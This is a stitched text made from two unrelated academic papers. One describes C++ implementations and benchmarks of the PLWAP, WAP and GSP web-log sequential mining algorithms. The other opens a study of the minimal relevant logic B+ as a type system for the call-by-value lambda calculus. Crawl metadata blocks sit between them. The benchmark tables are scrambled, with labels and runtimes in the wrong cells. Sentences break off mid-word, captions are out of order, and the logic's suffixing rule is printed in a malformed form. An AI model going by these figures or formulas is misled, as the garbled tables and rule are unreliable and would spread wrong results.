5. FUNCTIONS USED IN THE CODE: (i)BuildTree: builds the PLWAP tree, (ii)buildLinkage: Builds the pre-order linkage for PLWAP tree, (iii)makeCode: makes the position code for a node, (iv)checkPosition: checks the position between any two nodes in the PLWAP tree, (v)MiningProcess: mines sequential frequent patterns from the PLWAP tree using position codes.
6. DATA STRUCTURE: Three structures are used in this program: (i) the node struct indicates a PLWAP node which contains the following information: a. the event name, b. the number of occurrence of the event, c. a link to the position code, d. length of position code, e. the linkage to next node with same event name in PLWAP tree, f. a pointer to its left son, g. a pointer to its right sibling, h. a pointer to its parent, i. the number of its sons. (ii) a position code struct implemented as a linked list of unsigned integer to make it possible to handle data of any size without exceeding the maximum integer size. (iii) a linkage struct.
7. ADDITIONAL INFORMATION: The run time is displayed on the screen with start time, end time and total seconds for running the program.
3.2 C++ Implementation of the WAP Sequential Mining Algorithm
This is the WAP algorithm program based on the description in [17]: Jian Pei, Jiawei Han, Behzad Mortazavi-asl, and Hua Zhu, “Mining Access Patterns Efficiently from Web Logs”, PAKDD 2000.
1.DEVELOPMENT ENVIRONMENT: The same as described for PLWAP and can run in any UNIX system as well. (i)Hardware: Intel Celeron 400 PC, 64M Memory; (ii)Operating system: Windows 98; (iii)Development tool: Inprise(Borland) C++ Builder 6.0. The algorithm is developed under C++ Builder 6.0, and also compiles and runs under any standard C++ development tools.
2. INPUT FILES AND FORMAT:
i) Input file test.data: Pre-processed sequential input records
are read from the file “test.data”. The “test.data” file is composed of hundreds of thousands of lines of sequences where each line represents a web access sequence for each user.
Every line includes UserID, length of sequence and the sequence which are separated by tab spaces. For example, given a line: 100 5 10 20 40 10 30 100 represents UserID, 5 is the length of sequence, the sequence is 10, 20, 40, 10, 30.
ii) Input file middle.data: used to save the conditional middle patterns. During the WAP tree mining process, following the linkages, once the sum of support for an event is found greater than minimum support, all its prefix conditional patterns are saved in the “middle.data” file for next round mining. The format of “middle.data” is as follows: Each line includes the length of the sequence, the occurrence of the sequence, and the events in the sequence. For example, given a line in middle.data: 5 4 10 20 40 10 30, the length of sequence is 5, 4 indicates the sequence occurred 4 times in the previous conditional WAP tree and the sequence is 10, 20, 40, 10, 30.
3. MINIMUM SUPPORT:
The program also needs to accept a value between 0 and 1 for minimum support. The user is prompted for minimum support when the program starts.
4. OUTPUT FILES AND FORMAT: result_WAP.data
Once the program terminates, the result patterns are in a file named “result_WAP.data”, which may contain lines of patterns.
5. FUNCTIONS USED IN THE CODE:
(i)BuildTree: Builds the WAP tree/conditional WAP tree
(ii)MiningProcess: produces sequential pattern/conditional prefix sub-pattern from WAP tree/conditional WAP tree.
6. DATA STRUCTURE: three struct are used in this program: (i) the node struct indicates a WAP node which contains the following information: a. the event name, b. the number of occurrence of the event, c. the linkage to next node same event name in WAP tree, d. a pointer to it’s left son, e. a pointer to it’s rights sibling, f. a pointer to it’s parent.
(ii) a linkage struct described in the program.
7. ADDITIONAL INFORMATION: The run time is displayed on the screen with start time, end time and total seconds for running the program.
3.3 C++ Implementation of the GSP Sequential Mining Algorithm
This is a GSP algorithm implementation, which demonstrates the result described in [3]: R. Srikant and R. Agrawal. “Mining sequential patterns: Generalizations and performance improvements”, 1996.
1. DEVELOPMENT ENVIRONMENT: The same as described for PLWAP and runs in any UNIX system as well. (i) Hardware: Intel Celeron 400 PC, 64M Memory; (ii) Operating system: Windows 98; (iii) Development tool: Inprise/Borland C++ Builder 6.0. The algorithm is developed under C++ Builder 6.0 but also compiles and runs under any standard C++ development tools.
2. INPUT FILES AND FORMAT: Input file test.data: For simplifying input process of the program, we assume that all input data have been preprocessed such that all events belonging to the same user id have been gathered together, and formed as a sequence and saved in “test.data”. The “test.data” file is composed of hundreds of thousands of lines of sequences, where each line represents a web access sequence for each user. Every line includes UserID, length of sequence and the sequence which are separated by tab spaces. For example, given a line: 100 5 10 20 40 10 30 100 represents UserID, the length of the sequence is 5, the sequence is 10, 20, 40, 10, 30.
3. MINIMUM SUPPORT: The program also needs to accept a value between 0 and 1 as minimum support. The user is prompted for minimum support when the program starts.
4. OUTPUT FILES AND FORMAT: result_GSP.data
At the termination of the program, the result patterns are in a file named “result_GSP.data”, which may contain lines of frequent patterns.
5. FUNCTIONS USED IN THE CODE: (i)GSP: reads the file and mines levelwise according to the algorithm.
6. DATA STRUCTURES: There are struct for i) candidate sequence list and its count and ii) sequence.
7. ADDITIONAL INFORMATION: The run time is displayed on the screen with start time, end time and total seconds for running the program.
4. PERFORMANCE AND EXPERIMENTAL ANALYSIS OF THREE ALGORITHMS
The PLWAP algorithm eliminates the need to store numerous intermediate WAP trees during mining, thus, drastically cutting off huge memory access costs. The PLWAP annotates each tree node with a binary position code for quicker mining of the tree. This section compares the experimental performance analysis of PLWAP with the WAP-tree mining and the Apriori-like GSP algorithms. The three algorithms were initially implemented with C++ language running under Inprise C++ Builder environment. All initial experiments were performed on 400MHz Celeron PC machine with 64 megabytes memory running Windows 98 (for work in [7]). Current experiments are conducted with the same implementations of the programs and still on synthetic datasets generated using the resource data generator code from http://www.almaden.ibm.com/software/quest/Resources/index.shtml. This synthetic dataset has been used by most pattern mining studies [3, 12, 17]. Experiments were also run on real datasets generated from web log data of University of Windsor Computer Science server and preprocessed with our web log cleaner code. The correctness of the implementations were confirmed by checking that the frequent patterns generated for the same dataset by all algorithms are the same. A high speed UNIX SUN microsystem with a total of 16384 Mb memory and 8 x 1200 MHz processor speed is used for these experiments. The synthetic datasets consist of sequences of events, where each event represents an accessed web page. The parameters shown below are used to generate the data sets.
|D| Number of sequences in the database
---|---
|C| Average length of the sequences
|S| Average length of maximal potentially frequent sequence
|N| number of events
For example, C10.S5.N2000.D60K means that |C| = 10, |S| = 5, |N| = 2000, and |D| = 60K. It represents a group of data with average length of the sequences as 10, the average length of maximal potentially frequent sequence is 5, the number of individual events in the database is 2000,
algorithms are the same when there are nearly no frequent patterns found. The execution times of the two algorithms are pegged at some constant values. Observations are made at three levels of small, medium and large (e.g., small database size may consist of a table with records less than 40 thousands, medium size table has between 50 nd 200 thousands records, while large has over 300 thousand).
Experiment 1: Execution time trend with different minimum supports (small size database, 40K records):
This experiment uses fixed size database and different minimum support to compare the performance of PLWAP, WAP and GSP algorithms. The datasets are described as C2.5.S5.N50.D40K, and algorithms are tested with minimum supports between 0.05% and 20% against the 40 thousand (40K) database with 50 attributes and average sequence length of 2.5. The results of this experiment are shown in Table 3 and Figure 5 with the number of frequent patterns found reported as Fp. From this result, it can be seen that at minimum support of 0.05%, the number of frequent patterns found is highest and is 2729, the PLWAP algorithm ran almost 3 times faster than the WAP algorithm. As the minimum support increases, the number of frequent patterns found decreases and the gain in performance by the PLWAP algorithm over the WAP algorithm decreases. It can be seen that the more the number of frequent patterns found in a dataset, the higher the performance gain achieved by the PLWAP algorithm over the WAP algorithm. This is because the two algorithms spend about the same amount of time scanning the database and constructing the tree, but the PLWAP algorithm saves on storing and reading intermediate re-constructed tree, which are as many as the number of frequent patterns found. The execution times of the two algorithms are the same when there are nearly no frequent patterns.
Experiment 2: Execution times trend with different minimum supports (Medium size database, 200K records):
This experiment uses fixed size database and different minimum support to compare the performance of PLWAP, WAP and GSP algorithms. The algorithms are tested with minimum supports between 0.05% and 15% against the 200 thousand (200K) database, 50 attributes and average sequence length of 2.5. The results of this experiment are shown in Table 4 and Figure 6 with the number of frequent patterns found reported as Fp. It can be seen that the trend in performance is the same as with small database. When the minimum support reaches 15%, there are no frequent patterns found and the running times of the two algorithms become the same.
Experiment 3: Execution Times for Dataset at Different Minimum Supports (large database):
This experiment uses fixed size database and different minimum support to compare the performance of PLWAP, WAP and GSP algorithms. The algorithms are tested with minimum supports between 0.05% and 15% against one million (1M) record database. The results of this experiment are shown in Table 5 and Figure 7.
Experiment 3a: Execution Times for Dataset at Different Minimum Supports (large database but very low minimum supports):
This experiment uses fixed size database and different mini-
### Table 4: Execution Times for Dataset at Different Minimum Supports (medium database)
<table>
<thead>
<tr>
<th>Alg</th>
<th>Runtime (in secs) at Different Supports(%)</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td>0.05</td>
</tr>
<tr>
<td>Fp=</td>
<td>34275</td>
</tr>
<tr>
<td>2630</td>
<td>1271</td>
</tr>
<tr>
<td>GSP</td>
<td>WAP</td>
</tr>
</tbody>
</table>
### Figure 7: Execution Times for Dataset at Different Minimum Supports (large database)
Figure 7: Execution Times for Dataset at Different Minimum Supports (large database)
### Table 5: Execution Times for Dataset at Different Minimum Supports (large database)
<table>
<thead>
<tr>
<th>Alg</th>
<th>Runtime (in secs) at Different Supports(%)</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td>0.05</td>
</tr>
<tr>
<td>Fp=</td>
<td>63084</td>
</tr>
<tr>
<td>246</td>
<td>1296</td>
</tr>
<tr>
<td>GSP</td>
<td>WAP</td>
</tr>
</tbody>
</table>
### Table 6: Execution Times for Dataset at Different Minimum Supports (large database and low minsupp)
<table>
<thead>
<tr>
<th>Alg</th>
<th>Runtime (in secs) at Different Supports(%)</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td>0.001</td>
</tr>
<tr>
<td>Fp=</td>
<td>222K</td>
</tr>
<tr>
<td>WAP</td>
<td>13076</td>
</tr>
<tr>
<td>PLWAP</td>
<td>8183</td>
</tr>
</tbody>
</table>
### Figure 8: Execution Times for Dataset at Different Minimum Supports (large database and low minsupp)
Figure 8: Execution Times for Dataset at Different Minimum Supports (large database and low minsupp)
### Experiment 4: Execution times trend with different database sizes (small size database, 2K to 14K):
This experiment uses fixed size database and different minimum supports to compare the performance of PLWAP, WAP and GSP algorithms. The algorithms are tested on databases of sizes 2K to 14K at minimum support of 1%. The gain in performance by the PLWAP algorithm is constant across different sizes because the number of frequent patterns in different sized datasets generated by the data generator seem to be about the same at a particular minimum support. The results of this experiment are shown in Table 6 and Figure 8.
### Experiment 5: Execution times trend with different database sizes (medium size database, 20K to 200K):
This experiment uses fixed size database and different minimum supports to compare the performance of PLWAP, WAP and GSP algorithms. The algorithms are tested on databases of sizes 20K to 200K at minimum support of 1%. The results of this experiment are shown in Table 7 and Figure 9.
### Experiment 6: Execution times trend with different database sizes (large database, 300K to 1M):
This experiment uses fixed size database and different minimum supports to compare the performance of PLWAP, WAP and GSP algorithms. The algorithms are tested on databases of sizes 300K to 1M at minimum support of 1%. The results of this experiment are shown in Table 8 and Figure 10.
Figure 9: Execution Times Trend with Different Minimum Supports (large database)
Figure 10: Execution Times Trend with Different Database sizes (medium database)
900K):
This experiment uses fixed size database and different minimum support to compare the performance of PLWAP, WAP and GSP algorithms. The algorithms are tested with database sizes between 300K and 900K records at minimum support of 1%. The results of this experiment are shown in Table 9 and Figure 11.
Experiments were also run to check the behavior of the algorithms with varying sequence lengths and number of database attributes, and the PLWAP always runs faster than the WAP algorithm when the average sequence length is less than 20 and there are some found frequent patterns. However, the PLWAP performance starts to degrade when the average sequence length of the database is more than 20 because with extremely long sequences, there are nodes with position codes that are more than “maxint”, in our current implementation, we use a number of variables to store a node’s position code that are linked together. Thus, managing and retrieving the position code for excessively long sequences could turn out to be time consuming.
5. CONCLUSIONS
This paper discusses the source code implementation of the PLWAP algorithm presented in [7] as well as the our implementations of two other sequential mining algorithms WAP [17] and GSP [3] that PLWAP was compared with. Extensive experimental studies were conducted on the three implemented algorithms using IBM quest synthetic datasets. From the experiments, it was discovered that the PLWAP algorithm, which mines a pre-order linked, position coded version of the WAP tree, always outperforms the other two algorithms. PLWAP improves on the performance of the efficient tree-based WAP tree algorithm by mining with position codes and their suffix tree root sets, rather than storing intermediate WAP trees recursively. Thus, it saves on
Table 8: Execution Times for Different Database Sizes at Minsupport (medium database)
<table>
<thead>
<tr>
<th>Alg</th>
<th>Runtime (in secs) at Different Database sizes(%)</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td>20K</td>
</tr>
<tr>
<td>GSP</td>
<td>306</td>
</tr>
<tr>
<td>WAP</td>
<td>7</td>
</tr>
<tr>
<td>PLWAP</td>
<td>3</td>
</tr>
</tbody>
</table>
Figure 11: Execution Times Trend with Different Database sizes (large database)
Table 9: Execution Times for Different Database Sizes at Minsupport (large database)
<table>
<thead>
<tr>
<th>Alg</th>
<th>Runtime (in secs) at Different DB sizes(%)</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td>300K</td>
</tr>
<tr>
<td>GSP</td>
<td>5329</td>
</tr>
<tr>
<td>WAP</td>
<td>22</td>
</tr>
<tr>
<td>PLWAP</td>
<td>12</td>
</tr>
</tbody>
</table>
processing time and more so when the number of frequent patterns increases and the minimum support threshold is low. The PLWAP algorithm runs faster than the WAP algorithm even with very large databases. PLWAP’s performance seems to degrade some with very long sequences having sequence length more than 20 and this is because of the increase in the size of position code that it needs to build and process for such long sequences leading to very deep PLWAP tree. The experiments show that mining web log using PLWAP algorithm is much more efficient than with WAP-tree and GSP algorithms. For mining sequential patterns from web logs, the following aspects may be considered for future work. The PLWAP algorithm could be extended to handle sequential pattern mining in large traditional databases to handle concurrency of events. Also, efficient web usage mining, could benefit from relating usage to the content of web pages. Other areas of interest for future work include distributed mining with PLWAP tree and applying these techniques to incremental mining of web logs and sequential patterns.
6. ACKNOWLEDGMENTS
This research was supported by the Natural Science and Engineering Research Council (NSERC) of Canada under an operating grant (OGP-0194134) and a University of Windsor grant.
7. REFERENCES
|
{"Source-Url": "http://cezeife.myweb.cs.uwindsor.ca/plwapopen.pdf", "len_cl100k_base": 9839, "olmocr-version": "0.1.50", "pdf-total-pages": 10, "total-fallback-pages": 0, "total-input-tokens": 45094, "total-output-tokens": 12006, "length": "2e13", "weborganizer": {"__label__adult": 0.0002875328063964844, "__label__art_design": 0.00023424625396728516, "__label__crime_law": 0.0004396438598632813, "__label__education_jobs": 0.0006303787231445312, "__label__entertainment": 6.318092346191406e-05, "__label__fashion_beauty": 0.00012814998626708984, "__label__finance_business": 0.00032639503479003906, "__label__food_dining": 0.0002810955047607422, "__label__games": 0.000827789306640625, "__label__hardware": 0.0011587142944335938, "__label__health": 0.00036525726318359375, "__label__history": 0.0002351999282836914, "__label__home_hobbies": 0.00011903047561645508, "__label__industrial": 0.00052642822265625, "__label__literature": 0.00023567676544189453, "__label__politics": 0.000213623046875, "__label__religion": 0.0003914833068847656, "__label__science_tech": 0.05902099609375, "__label__social_life": 8.285045623779297e-05, "__label__software": 0.0176544189453125, "__label__software_dev": 0.916015625, "__label__sports_fitness": 0.00023448467254638672, "__label__transportation": 0.00040030479431152344, "__label__travel": 0.00016176700592041016}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 46080, 0.06734]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 46080, 0.5927]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 46080, 0.89058]], "google_gemma-3-12b-it_contains_pii": [[0, 4559, false], [4559, 11966, null], [11966, 15425, null], [15425, 21151, null], [21151, 25771, null], [25771, 31993, null], [31993, 35195, null], [35195, 38163, null], [38163, 41022, null], [41022, 46080, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4559, true], [4559, 11966, null], [11966, 15425, null], [15425, 21151, null], [21151, 25771, null], [25771, 31993, null], [31993, 35195, null], [35195, 38163, null], [38163, 41022, null], [41022, 46080, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 46080, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 46080, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 46080, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 46080, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 46080, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 46080, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 46080, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 46080, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 46080, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 46080, null]], "pdf_page_numbers": [[0, 4559, 1], [4559, 11966, 2], [11966, 15425, 3], [15425, 21151, 4], [21151, 25771, 5], [25771, 31993, 6], [31993, 35195, 7], [35195, 38163, 8], [38163, 41022, 9], [41022, 46080, 10]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 46080, 0.21053]]}
|
olmocr_science_pdfs
|
2024-11-28
|
2024-11-28
|
790d602c1e825075124eaf2300f8f551c892dfe7
|
[REMOVED]
|
{"Source-Url": "https://hal-lirmm.ccsd.cnrs.fr/lirmm-01871487/file/carbonnel2017.pdf", "len_cl100k_base": 15740, "olmocr-version": "0.1.50", "pdf-total-pages": 26, "total-fallback-pages": 0, "total-input-tokens": 78343, "total-output-tokens": 19314, "length": "2e13", "weborganizer": {"__label__adult": 0.0002601146697998047, "__label__art_design": 0.0005431175231933594, "__label__crime_law": 0.00024437904357910156, "__label__education_jobs": 0.001220703125, "__label__entertainment": 5.65648078918457e-05, "__label__fashion_beauty": 0.0001302957534790039, "__label__finance_business": 0.0002658367156982422, "__label__food_dining": 0.0002366304397583008, "__label__games": 0.0004649162292480469, "__label__hardware": 0.0004343986511230469, "__label__health": 0.00026607513427734375, "__label__history": 0.0002243518829345703, "__label__home_hobbies": 8.308887481689453e-05, "__label__industrial": 0.0002827644348144531, "__label__literature": 0.0002841949462890625, "__label__politics": 0.0001729726791381836, "__label__religion": 0.00032138824462890625, "__label__science_tech": 0.01433563232421875, "__label__social_life": 8.600950241088867e-05, "__label__software": 0.0093231201171875, "__label__software_dev": 0.97021484375, "__label__sports_fitness": 0.0001723766326904297, "__label__transportation": 0.00030922889709472656, "__label__travel": 0.00015473365783691406}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 65611, 0.04385]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 65611, 0.12429]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 65611, 0.86356]], "google_gemma-3-12b-it_contains_pii": [[0, 619, false], [619, 2954, null], [2954, 6426, null], [6426, 9451, null], [9451, 11821, null], [11821, 13310, null], [13310, 16385, null], [16385, 18932, null], [18932, 21170, null], [21170, 24301, null], [24301, 26430, null], [26430, 29947, null], [29947, 32042, null], [32042, 33771, null], [33771, 33953, null], [33953, 36080, null], [36080, 39424, null], [39424, 41255, null], [41255, 42796, null], [42796, 45029, null], [45029, 48597, null], [48597, 52727, null], [52727, 56131, null], [56131, 59115, null], [59115, 62374, null], [62374, 65611, null]], "google_gemma-3-12b-it_is_public_document": [[0, 619, true], [619, 2954, null], [2954, 6426, null], [6426, 9451, null], [9451, 11821, null], [11821, 13310, null], [13310, 16385, null], [16385, 18932, null], [18932, 21170, null], [21170, 24301, null], [24301, 26430, null], [26430, 29947, null], [29947, 32042, null], [32042, 33771, null], [33771, 33953, null], [33953, 36080, null], [36080, 39424, null], [39424, 41255, null], [41255, 42796, null], [42796, 45029, null], [45029, 48597, null], [48597, 52727, null], [52727, 56131, null], [56131, 59115, null], [59115, 62374, null], [62374, 65611, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 65611, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 65611, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 65611, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 65611, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 65611, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 65611, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 65611, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 65611, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 65611, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 65611, null]], "pdf_page_numbers": [[0, 619, 1], [619, 2954, 2], [2954, 6426, 3], [6426, 9451, 4], [9451, 11821, 5], [11821, 13310, 6], [13310, 16385, 7], [16385, 18932, 8], [18932, 21170, 9], [21170, 24301, 10], [24301, 26430, 11], [26430, 29947, 12], [29947, 32042, 13], [32042, 33771, 14], [33771, 33953, 15], [33953, 36080, 16], [36080, 39424, 17], [39424, 41255, 18], [41255, 42796, 19], [42796, 45029, 20], [45029, 48597, 21], [48597, 52727, 22], [52727, 56131, 23], [56131, 59115, 24], [59115, 62374, 25], [62374, 65611, 26]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 65611, 0.24478]]}
|
olmocr_science_pdfs
|
2024-11-28
|
2024-11-28
|
9328a5cbb28626462339dbd998aef46a19f2248b
|
The Minimal Relevant Logic and the Call-by-Value Lambda Calculus*
S. van Bakel, M. Dezani-Ciancaglini, U. de’Liguoro, Y. Motohama
Department of Computing, Imperial College London, UK
Dipartimento di Informatica, Università degli Studi di Torino, Italy
Abstract
The minimal relevant logic $B^+$, seen as a type discipline, includes an extension of Curry types known as the intersection type discipline. We will show that the full logic $B^+$ gives a type assignment system which produces a model of Plotkin’s call-by-value $\lambda$-calculus.
1 Introduction
The logical system $B^+$ arose from Meyer and Routley’s investigation on the negation-free entailment logic [12]. In their approach, $B^+$ turns out as the minimal relevant logic, which is complete with respect to a variant of Kripke models, called the positive model structures.
Independently, and with quite different aims, an extension of the Curry type assignment system with “intersection” types was introduced in [3] by Coppo and Dezani. The same authors, together with Barendregt, were able to prove in [2] that, provided a suitable axiomatisation of the subtype relation $A \leq B$, the set of filters over types is a $\lambda$-model. As a consequence, a completeness theorem for the intersection types assignment system was established.
As remarked by Meyer in [8], it can be recognised that $A \leq B$ holds in the type theory of [2] if and only if, “on translation”, $A \rightarrow B$ is a theorem of $B^+$. However, the language of $B^+$ has one more connective than intersection types, namely disjunction. Extensions of the intersection type discipline with a “union” type constructor have been pursued, by some of the present authors together with others, both in the framework of classical $\lambda$-calculus and in that of some “parallel” and non-deterministic extensions of $\lambda$-calculus: see [1, 5, 4]. From this investigations it turns out that strong systems of union types do not give filter $\lambda$-models, while weaker systems allow for a satisfactory logical analysis of some extended $\lambda$-calculi.
Here we will follow a different path. Instead of extending the calculus, we will consider Plotkin’s call-by-value $\lambda$-calculus [9], whose syntax is the same as that of the $\lambda K$-calculus, but the $\beta$-rule is replaced by a restricted form:
\[ \beta_v \quad (\lambda x.M)N \rightarrow M[N/x], \quad \text{if } N \text{ is not an application.} \]
The idea is that a term that is an application needs to be further evaluated before it can be passed on as an argument. By rule $(\beta_v)$, in contrast to the classical $\beta$-rule, substitution is delayed until the evaluation of the argument $N$ reaches a value, namely either a variable or an abstraction. Because of this, the call-by-value $\lambda$-calculus has been proposed and studied as the abstract counterpart of call-by-value lazy programming languages, reflecting closer
---
* Partially supported by NATO Collaborative Research Grant CRG 970285 ‘Extended Rewriting and Types’.
the actual practice of language implementation. In fact, the subtleties of parameter passing
can be caught by the formal calculus, and analyzed using both proof theoretical and model
theoretical tools in an elegant way [6, 10, 11].
What we will show here is that \( \mathcal{B}^+ \) is the type theory of the call-by-value \( \lambda \)-calculus, in the
following sense: we will consider the full language of the logic \( \mathcal{B}^+ \), including disjunction,
and take the \( \mathcal{B}^+ \) axioms and rules as defining a subtype relation. Then we will consider a
type assignment system which is essentially that of [2], but using the extended type syntax
and subtyping relation hinted above, with a key restriction on the types that can be assumed
for variables in a basis. It turns out that, within this system, types are preserved under
\( \beta\nu \)-conversion. Moreover, the filter structure of the type theory is an instance of call-by-value
syntactical \( \lambda \)-model (a generalisation, [6, 10, 11] of the notion of syntactical \( \lambda \)-model due to
Hindley and Longo [7]).
2 The minimal relevant logic \( \mathcal{B}^+ \) as a type discipline
The minimal relevant logic \( \mathcal{B}^+ \) is a propositional calculus. To see \( \mathcal{B}^+ \) as a type discipline,
we interpret propositions as types: the constant for truth is interpreted as a constant type \( \nu \),
whose intended meaning is “the type of values”; implication as the arrow type connective \( \to \),
conjunction and disjunction as intersection (\( \land \)) and union type connectives (\( \lor \)), respectively.
Then we define a preorder relation \( \leq \) such that \( A \leq B \) if and only if \( A \to B \) is a theorem of
\( \mathcal{B}^+ \).
Definition 2.1 (The set \( L \) of formulae) The set \( L \) of formulae is defined by
i) a denumerable set \( \mathcal{P} \nu \) of propositional variables, ranged over by \( a,b,c \) possibly with
subscripts;
ii) \( \nu \in L \) (a type constant);
iii) \( A,B \in L \Rightarrow (A \to B),(A \land B),(A \lor B) \in L \).
Notation. To avoid using too many parentheses, we assume that \( \land \) and \( \lor \) take precedence
over \( \to \), and that \( \to \) associates to the right.
Definition 2.2 (The minimal relevant logic \( \mathcal{B}^+ \) with \( \leq \)) \( \mathcal{B}^+ \) is the logic on the language \( L \)
defined by the following axioms and rules:
\[
\begin{align*}
(A1) & : A \leq \nu \\
(A2) & : A \leq A \\
(A3) & : A \leq A \land A \\
(A4) & : A \land B \leq A, A \land B \leq B \\
(A5) & : A \lor A \leq A \\
(A6) & : A \leq A \lor B, B \leq A \lor B \\
(A7) & : (A \to B) \land (A \to C) \leq A \to B \land C \\
(A8) & : (A \to C) \land (B \to C) \leq A \lor B \to C \\
(A9) & : A \land (B \lor C) \leq (A \land B) \lor (A \land C) \\
(R1) & : A \leq B, B \leq C \Rightarrow A \leq C \text{ (transitivity)} \\
(R2) & : A \leq B, C \leq D \Rightarrow A \land C \leq B \land D \text{ (\( \land \)-monotonicity)} \\
(R3) & : A \leq B, C \leq D \Rightarrow A \lor C \leq B \lor D \text{ (\( \lor \)-monotonicity)} \\
(R4) & : A \leq B \Rightarrow B \leq C \leq A \to C \text{ (suffixing)} \\
(R5) & : B \leq C \Rightarrow A \to B \leq A \to C \text{ (prefixing)}.
\end{align*}
\]
We define \( \sim \) as the symmetric closure of \( \leq \). The relation \( \sim \) enjoys the following properties:
i) \( \sim \) is a congruence relation.
ii) \( A \land B \sim B \land A, \ A \lor B \sim B \lor A. \)
iii) \( (A \land B) \land C \sim A \land (B \land C), \ (A \lor B) \lor C \sim A \lor (B \lor C). \)
iv) \( A \land (B \lor C) \sim (A \land B) \lor (A \land C), \ A \lor (B \land C) \sim (A \lor B) \land (A \lor C) \) (distributivity).
v) \( (A \rightarrow B) \land (A \rightarrow C) \sim (A \rightarrow B \land C). \)
vi) \( (A \rightarrow C) \land (B \rightarrow C) \sim (A \lor B \rightarrow C). \)
To further investigate properties of the system \( B^+ \), it is useful to associate to each type both its conjunctive and disjunctive normal form. First let us define inductively the following subsets of \( L \).
**Definition 2.3 (Stratification of \( L \))** \( T_\rightarrow, T_\lor, T_\land, T_\land\lor, T_\lor\land \subseteq L \) are inductively defined:
\[(T_\rightarrow): \ v \in T_\rightarrow; \ a \in T_\rightarrow, \ for \ all \ propositional \ variables \ a \]
\( A \in T_\land, B \in T_\lor \Rightarrow A \rightarrow B \in T_\rightarrow \)
\( (T_\lor): \ A \in T_\rightarrow \Rightarrow A \in T_\lor \)
\( A, B \in T_\lor \Rightarrow A \lor B \in T_\lor \)
\( (T_\land): \ A \in T_\rightarrow \Rightarrow A \in T_\land \)
\( A, B \in T_\land \Rightarrow A \land B \in T_\land \)
\( (T_\land\lor): \ A \in T_\lor \Rightarrow A \in T_\land\lor \)
\( A, B \in T_\land\lor \Rightarrow A \land B \in T_\land\lor \)
\( (T_\lor\land): \ A \in T_\land \Rightarrow A \in T_\lor\land \)
\( A, B \in T_\lor\land \Rightarrow A \lor B \in T_\lor\land. \)
We will now introduce maps from arbitrary types belonging to \( L \) into their conjunctive/disjunctive normal forms in \( T_\land\lor \) and \( T_\lor\land \), respectively.
**Definition 2.4** The maps \( m_{\land\lor}: L \rightarrow T_\land\lor \) and \( m_{\lor\land}: L \rightarrow T_\lor\land \) are as follows defined by simultaneously induction on the structure of formulæ:
i) \( m_{\land\lor}(A) = m_{\lor\land}(A) = A \) if \( A \in \mathcal{P}V \cup \{v\} \).
ii) If \( m_{\land\lor}(A) = \bigvee_{i \in I} A_i \) (where each \( A_i \in T_\land \)) and \( m_{\lor\land}(B) = \bigwedge_{j \in J} B_j \) (where each \( B_j \in T_\lor \)) then
\[
m_{\land\lor}(A \rightarrow B) = m_{\lor\land}(A \rightarrow B) = \bigwedge_{i \in I} \bigvee_{j \in J} (A_i \rightarrow B_j).
\]
iii) \( m_{\land\lor}(A \land B) = m_{\land\lor}(A) \land m_{\land\lor}(B) \), and, if \( m_{\land\lor}(A) = \bigvee_{i \in I} A_i \) and \( m_{\lor\land}(B) = \bigwedge_{j \in J} B_j \) then
\[
m_{\land\lor}(A \land B) = \bigvee_{i \in I} \bigwedge_{j \in J} (A_i \land B_j).
\]
iv) \( m_{\land\lor}(A \lor B) = m_{\land\lor}(A) \lor m_{\land\lor}(B) \), and, if \( m_{\land\lor}(A) = \bigwedge_{i \in I} A_i \) and \( m_{\lor\land}(B) = \bigvee_{j \in J} B_j \) then
\[
m_{\land\lor}(A \lor B) = \bigwedge_{i \in I} \bigvee_{j \in J} (A_i \lor B_j).
\]
We shall prove, in the Appendix, that \( A \sim m_{\land\lor}(A) \sim m_{\lor\land}(A) \) for all \( A \).
